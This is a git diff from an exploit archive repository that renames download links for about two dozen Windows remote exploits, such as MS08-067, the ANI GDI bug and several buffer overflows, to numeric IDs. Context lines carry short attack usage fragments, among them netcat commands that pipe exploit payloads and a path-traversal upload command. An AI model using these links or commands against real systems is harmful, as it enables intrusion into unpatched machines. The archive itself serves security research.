a/platforms/windows/remote/3804.txt +++ b/platforms/windows/remote/3804.txt @@ -1,5 +1,5 @@ MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017) -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04262007-gdi_remote_elevation_privilege_exploit_ms07_017_principal.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3804.zip (04262007-gdi_remote_elevation_privilege_exploit_ms07_017_principal.zip) # milw0rm.com [2007-04-26] diff --git a/platforms/windows/remote/418.c b/platforms/windows/remote/418.c index b58a8b192..f60fb20d4 100755 --- a/platforms/windows/remote/418.c +++ b/platforms/windows/remote/418.c @@ -2,7 +2,7 @@ This 0day exploit is known to be circulating in the wild There is no patch for this vulnerability -> Do not use Winamp ! -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/skinhead.rar (171 Ko) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/418.rar (skinhead.rar - 171 Ko) index.html diff --git a/platforms/windows/remote/4188.txt b/platforms/windows/remote/4188.txt index 62628ccaa..9e923456c 100755 --- a/platforms/windows/remote/4188.txt +++ b/platforms/windows/remote/4188.txt @@ -2,6 +2,6 @@ Author:(yunshu) http://www.ph4nt0m.org poc: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/07162007-flash_flv_9.0.45.0_exp.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4188.zip (07162007-flash_flv_9.0.45.0_exp.zip) # milw0rm.com [2007-07-16] diff --git a/platforms/windows/remote/4334.txt b/platforms/windows/remote/4334.txt index 28475dd40..acb3b0ec3 100755 --- a/platforms/windows/remote/4334.txt +++ b/platforms/windows/remote/4334.txt @@ -7,6 +7,6 @@ thanks ole andre again, His ospy is perfect. 3. choose "send my webcam" to a contact id who is online using 7.x (8.0?). 4.when the otherside accept the invatation , the otherside's msn will be at least crashed, if you using aChinese version windows 2000 sp4 , maybe a reverse shell , if other verison windows 2000, you need adjust the jmpa address in the dll's sourcecode. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/08292007-exp_msn.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4334.rar (08292007-exp_msn.rar) # milw0rm.com [2007-08-29] diff --git a/platforms/windows/remote/4664.txt b/platforms/windows/remote/4664.txt index 89f9acd17..be6f17e37 100755 --- a/platforms/windows/remote/4664.txt +++ b/platforms/windows/remote/4664.txt @@ -37,6 +37,6 @@ Fuckz 2: - wslabi.com (too stupid resource for selling shit) - ICEPACK and MPACK coderz (Fucking javascript kidd0z and code thiefz) -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11272007-qt_public.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4664.tar.gz (11272007-qt_public.tar.gz) # milw0rm.com [2007-11-27] diff --git a/platforms/windows/remote/4699.txt b/platforms/windows/remote/4699.txt index 6672428ba..f9c965078 100755 --- a/platforms/windows/remote/4699.txt +++ b/platforms/windows/remote/4699.txt @@ -112,7 +112,7 @@ disconnects from it. Example queries to send with netcat: http://aluigi.org/poc/fireflyz.zip - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2007-fireflyz.zip + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4699.zip (2007-fireflyz.zip) nc localhost 9999 -v -v < file.txt diff --git a/platforms/windows/remote/4715.txt b/platforms/windows/remote/4715.txt index 7ec2193d1..c3cde7af5 100755 --- a/platforms/windows/remote/4715.txt +++ b/platforms/windows/remote/4715.txt @@ -86,7 +86,7 @@ http://aluigi.org/poc/badbluebof.txt B] http://aluigi.org/testz/myhttpup.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2007-myhttpup.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4715.zip (2007-myhttpup.zip) myhttpup http://SERVER/upload.dll file.txt ../../file.txt filedata0 diff --git a/platforms/windows/remote/4760.txt b/platforms/windows/remote/4760.txt index d07e2adc4..dc688152d 100755 --- a/platforms/windows/remote/4760.txt +++ b/platforms/windows/remote/4760.txt @@ -79,6 +79,6 @@ Microsoft Windows 2000 [Versión 5.00.2195] C:\WINNT\system32> Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2007-MessageQueue.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4760.zip (2007-MessageQueue.zip) # milw0rm.com [2007-12-21] diff --git a/platforms/windows/remote/4906.txt b/platforms/windows/remote/4906.txt index d7f2f7d11..4cbbf0743 100755 --- a/platforms/windows/remote/4906.txt +++ b/platforms/windows/remote/4906.txt @@ -1,5 +1,5 @@ Quicktime Player 7.3.1.70 rtsp Remote Buffer Overflow Exploit PoC -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-quicktimebof.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4906.zip (2008-quicktimebof.zip) # milw0rm.com [2008-01-14] diff --git a/platforms/windows/remote/4948.txt b/platforms/windows/remote/4948.txt index b3c5b3b51..43d81bf1b 100755 --- a/platforms/windows/remote/4948.txt +++ b/platforms/windows/remote/4948.txt @@ -1,5 +1,5 @@ Windows RSH daemon <= 1.8 Remote Buffer Overflow Exploit -Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-prdelka-vs-MS-rshd.tar.gz +Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4948.tar.gz (2008-prdelka-vs-MS-rshd.tar.gz) # milw0rm.com [2008-01-21] diff --git a/platforms/windows/remote/4949.txt b/platforms/windows/remote/4949.txt index b4d90a707..937456c5f 100755 --- a/platforms/windows/remote/4949.txt +++ b/platforms/windows/remote/4949.txt @@ -1,5 +1,5 @@ Citadel SMTP <= 7.10 Remote Overflow Exploit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-vs-GNU-citadel.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4949.tar.gz (2008-vs-GNU-citadel.tar.gz) # milw0rm.com [2008-01-21] diff --git a/platforms/windows/remote/5213.txt b/platforms/windows/remote/5213.txt index 771eadb4c..2906c251b 100755 --- a/platforms/windows/remote/5213.txt +++ b/platforms/windows/remote/5213.txt @@ -1,5 +1,5 @@ Versant server <= 7.0.1.3 Arbitrary Commands Execution Exploit -Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-versantcmd.zip +Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5213.zip (2008-versantcmd.zip) # milw0rm.com [2008-03-04] diff --git a/platforms/windows/remote/6004.txt b/platforms/windows/remote/6004.txt index ad57fb44d..0101afccd 100755 --- a/platforms/windows/remote/6004.txt +++ b/platforms/windows/remote/6004.txt @@ -13,6 +13,6 @@ Panda has patched newest version, so update will not connect to custom ( attacke Exploit: http://karol.wiesek.pl/files/panda.tgz -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-panda.tgz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6004.tgz (2008-panda.tgz) # milw0rm.com [2008-07-04] diff --git a/platforms/windows/remote/6367.txt b/platforms/windows/remote/6367.txt index 9f1687b9c..cc5d3c2f7 100755 --- a/platforms/windows/remote/6367.txt +++ b/platforms/windows/remote/6367.txt @@ -22,6 +22,6 @@ and embedded systems… · Website : security.bkis.vn · Mail : svrt[at]bkav.com.vn -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-chrome.tgz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6367.tgz (2008-chrome.tgz) # milw0rm.com [2008-09-05] diff --git a/platforms/windows/remote/6656.txt b/platforms/windows/remote/6656.txt index d31a5c562..d334afa29 100755 --- a/platforms/windows/remote/6656.txt +++ b/platforms/windows/remote/6656.txt @@ -16,6 +16,6 @@ On Windows Xp Sp2 only causes Denial of service. -(Vulnerable function guarded with a GS cookie) -(The function which copies data to stack has an exception handler which recovers from access violations so u cant exploit it by hitting next page ). -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-Gdi.tgz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6656.tgz (2008-Gdi.tgz) # milw0rm.com [2008-10-02] diff --git a/platforms/windows/remote/6841.txt b/platforms/windows/remote/6841.txt index 408889422..ec94686a4 100755 --- a/platforms/windows/remote/6841.txt +++ b/platforms/windows/remote/6841.txt @@ -1,6 +1,6 @@ MS08-067 Exploit for CN by EMM exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-MS08-067.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6841.rar (2008-MS08-067.rar) # milw0rm.com [2008-10-26] diff --git a/platforms/windows/remote/7125.txt b/platforms/windows/remote/7125.txt index 4175178c3..2abb3205d 100755 --- a/platforms/windows/remote/7125.txt +++ b/platforms/windows/remote/7125.txt @@ -2,6 +2,6 @@ * (c) 2008 Andres Tarasco Acuña ( atarasco _at_ gmail.com ) * URL: http://tarasco.org/Web/tools.html -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-smbrelay3.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7125.zip (2008-smbrelay3.zip) # milw0rm.com [2008-11-14] diff --git a/platforms/windows/remote/7403.txt b/platforms/windows/remote/7403.txt index c897929c2..6ac897532 100755 --- a/platforms/windows/remote/7403.txt +++ b/platforms/windows/remote/7403.txt @@ -4,6 +4,6 @@ // http://www.metasploit.com // EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-iesploit.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7403.zip (2008-iesploit.tar.gz) # milw0rm.com [2008-12-10] diff --git a/platforms/windows/remote/8173.txt b/platforms/windows/remote/8173.txt index 346ce5fc8..3f0b9eec0 100755 --- a/platforms/windows/remote/8173.txt +++ b/platforms/windows/remote/8173.txt @@ -8,6 +8,6 @@ nc host port < belkin-buldog-exploit Thats all folks! -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-belkin-bulldog-exploit.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8173.zip (2009-belkin-bulldog-exploit.zip) # milw0rm.com [2009-03-09] diff --git a/platforms/windows/remote/8704.txt b/platforms/windows/remote/8704.txt index 3aeb0674c..4d4b086f4 100755 --- a/platforms/windows/remote/8704.txt +++ b/platforms/windows/remote/8704.txt @@ -40,7 +40,7 @@ #### ###### ### ############### # ### -archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-IIS-Advisory.pdf +archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8704.pdf (2009-IIS-Advisory.pdf) *** FOR IMMEDIATE RELEASE *** *** FOR IMMEDIATE RELEASE *** diff --git a/platforms/windows/remote/8938.txt b/platforms/windows/remote/8938.txt index ad18302d0..d712eeeb5 100755 --- a/platforms/windows/remote/8938.txt +++ b/platforms/windows/remote/8938.txt @@ -12,6 +12,6 @@ to bypass DEP and ASLR on Vista. The exploit page contains a .net control, so it should be published on IIS. ---seer[N.N.U] -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-green-dam.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8938.zip (2009-green-dam.zip) # milw0rm.com [2009-06-12] diff --git a/platforms/windows/remote/986.html b/platforms/windows/remote/986.html index 41d13aa6f..5956bc20e 100755 --- a/platforms/windows/remote/986.html +++ b/platforms/windows/remote/986.html @@ -1,5 +1,5 @@